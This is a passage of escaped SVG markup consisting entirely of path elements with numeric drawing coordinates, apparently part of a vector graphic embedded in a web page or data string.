d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path 